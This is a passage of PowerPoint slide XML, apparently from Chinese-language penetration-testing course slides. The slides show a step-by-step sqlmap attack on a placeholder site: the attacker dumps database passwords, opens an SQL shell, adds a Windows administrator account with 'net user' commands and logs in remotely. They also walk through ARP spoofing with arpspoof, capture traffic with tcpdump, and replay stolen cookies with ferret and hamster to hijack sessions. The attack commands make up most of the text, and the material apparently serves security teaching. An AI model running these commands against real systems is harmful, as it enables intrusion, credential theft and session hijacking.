            <a:off x="582999" y="3078726"/>
            <a:ext cx="10896549" cy="1973524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="617" name="Shape 617"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463548" y="1727200"/>
            <a:ext cx="283083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#列数据库用户密码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="618" name="Shape 618"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="482402" y="2231562"/>
            <a:ext cx="1161794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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>sqlmap -u “http://xxx/newsInfo.php?news_id=1&amp;classsn=8001” --passwords</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="619" name="Shape 619"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="444302" y="5511799"/>
            <a:ext cx="7101206"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#得到ht_zhengke2用户的明文密码为ht_zhengke2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide9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21" name="image90.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1830748" y="872728"/>
            <a:ext cx="9343303" cy="5655813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="622" name="Shape 622"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472581" y="340187"/>
            <a:ext cx="434848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#nmap扫描发现开放3389端口</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="623" name="Shape 623"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="834617" y="8570463"/>
            <a:ext cx="604153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1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>net user root 12345 /add </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>net localgroup administrators root /add</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="624" name="Shape 624"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="459881" y="8015764"/>
            <a:ext cx="6129339"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#在sqlshell中添加一个用户并提升到管理员</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="625" name="Shape 625"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="506417" y="6992750"/>
            <a:ext cx="2090103"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#进入sql shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="626" name="Shape 626"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="785817" y="7486002"/>
            <a:ext cx="11247265"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>sqlmap -u “http://xxx/newsInfo.php?news_id=1&amp;classsn=8001” --sql-shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide9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28" name="image91.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-9621" y="1530687"/>
            <a:ext cx="12926798" cy="8079249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="629" name="Shape 629"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="828212"/>
            <a:ext cx="505333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#使用新添加的用户远程登录服务器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide9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1" name="Shape 631"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4972050" y="459911"/>
            <a:ext cx="2202465"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369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr b="1" sz="3700">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Arpspoof</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="632" name="Shape 632"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647698" y="1220556"/>
            <a:ext cx="11406727" cy="193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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>由于局域网的网络流通不是根据IP地址进行，而是根据MAC地址进行传输。所以，MAC地址在A上被伪造成一个不存在的MAC地址，这样就会导致网络不通，A不能Ping通C。这就是一个简单的ARP欺骗，利用的是ARP协议的漏洞。往往在内网渗透中，可配合其他工具用于网络嗅探、流量劫持等作用。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="633" name="Shape 633"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534440" y="8521700"/>
            <a:ext cx="19431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实例应用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="634" name="Shape 634"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3669651" y="8610600"/>
            <a:ext cx="7480991"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>ARP欺骗攻击及会话劫持、ARP断网攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="635" name="image92.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2572810" y="3317366"/>
            <a:ext cx="8048093" cy="5126825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide9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7" name="Shape 637"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525718" y="1150705"/>
            <a:ext cx="2054648"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>ARP欺骗攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="638" name="Shape 638"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532432" y="330199"/>
            <a:ext cx="138430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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>命令结构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="639" name="Shape 639"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2701989" y="368299"/>
            <a:ext cx="5617686"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500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>arpspoof [-i interface] [-t target] host</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="640" name="Shape 640"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="904693" y="2284536"/>
            <a:ext cx="74930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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>环境</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="641" name="Shape 641"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1728174" y="2094036"/>
            <a:ext cx="2920684"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500"/>
            </a:pPr>
            <a:r>
              <a:t>Windows XP SP3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>IP：172.16.211.129</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="642" name="Shape 642"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5646284" y="2094036"/>
            <a:ext cx="2920683"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500"/>
            </a:pPr>
            <a:r>
              <a:t>Kali Linux </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>IP：172.16.211.128</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="643" name="Shape 643"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4776175" y="2195636"/>
            <a:ext cx="5715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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="644" name="Shape 644"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9532484" y="2055936"/>
            <a:ext cx="2567623"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500"/>
            </a:pPr>
            <a:r>
              <a:t>网关</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>IP：172.16.211.2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="645" name="Shape 645"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8662375" y="2195636"/>
            <a:ext cx="5715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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="646" name="Shape 646"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8709691" y="330199"/>
            <a:ext cx="378333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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>-i  表示网卡，-t 表示目标  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="647" name="Shape 647"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1083453" y="4743340"/>
            <a:ext cx="6060759"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>echo 1 &gt;&gt; /proc/sys/net/ipv4/ip_forward</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="648" name="Shape 648"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990912" y="4276971"/>
            <a:ext cx="6411914"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#开启IP转发（可使用cat查看是否设置成功）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="649" name="Shape 649"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1058702" y="5975239"/>
            <a:ext cx="7791817"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>arpspoof   -i   eth0   -t  172.16.211.129   172.16.211.2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="650" name="Shape 650"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="955390" y="5454540"/>
            <a:ext cx="505333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#重定向受害者的流量传送给攻击者</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="651" name="image93.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1019543" y="6793638"/>
            <a:ext cx="10778757" cy="1718175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide9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3" name="Shape 653"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="487618" y="359731"/>
            <a:ext cx="5371190"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>tcpdump抓包(使用wireshark也可以)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="654" name="Shape 654"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="501648" y="965199"/>
            <a:ext cx="1122680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atin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>因为网关具有路由功能，因此只要监听本地网卡流量就能得到目标主机的流量。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="655" name="Shape 655"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514348" y="1570666"/>
            <a:ext cx="9852644"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500"/>
            </a:pPr>
            <a:r>
              <a:t>简单用法： </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>tcpdump -w cookie.cap  #</a:t>
            </a:r>
            <a:r>
              <a:t>抓取所有流量写入cookie.cap </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="656" name="Shape 656"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="509710" y="3568698"/>
            <a:ext cx="11985380" cy="101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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>进行一段时间的欺骗，期间可以随便浏览些网页，聊天之类的，比如现在访问数字杭电，一段时间后停止欺骗、停止抓包，并配合使用ferret处理抓取的流量。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="657" name="image94.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="544277" y="2575236"/>
            <a:ext cx="11425474" cy="547695"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="658" name="Shape 658"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514348" y="4597399"/>
            <a:ext cx="7276642"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500"/>
            </a:pPr>
            <a:r>
              <a:t>简单用法： </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>ferret -r cookie.cap  #</a:t>
            </a:r>
            <a:r>
              <a:t>处理抓取的流量</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="659" name="image95.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="506008" y="5456818"/>
            <a:ext cx="11502012" cy="3442296"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide9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1" name="Shape 661"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="487618" y="397831"/>
            <a:ext cx="1349575"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>hamster</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="662" name="Shape 662"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="915972" y="1020131"/>
            <a:ext cx="845312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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>确保处理后的cookie.cap在root用户根目录后，运行hamster</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="663" name="Shape 663"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913432" y="3009899"/>
            <a:ext cx="424180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接着根据提示设置浏览器代理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="664" name="image96.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1498600" y="1718630"/>
            <a:ext cx="7633129" cy="881353"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="665" name="image97.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1864903" y="3778989"/>
            <a:ext cx="6900524" cy="2195623"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="666" name="Shape 666"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913433" y="6388100"/>
            <a:ext cx="548894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Kali 自带的Firefox浏览器设置代理如图</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="667" name="image98.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1434853" y="7153616"/>
            <a:ext cx="9626848" cy="1607453"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide9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9" name="Shape 669"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="697533" y="558799"/>
            <a:ext cx="8318818"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设置好代理后浏览器中访问hamster或http://127.0.0.1:1234</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="670" name="image99.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1234720" y="1757957"/>
            <a:ext cx="10296251" cy="6237676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide9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72" name="image100.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
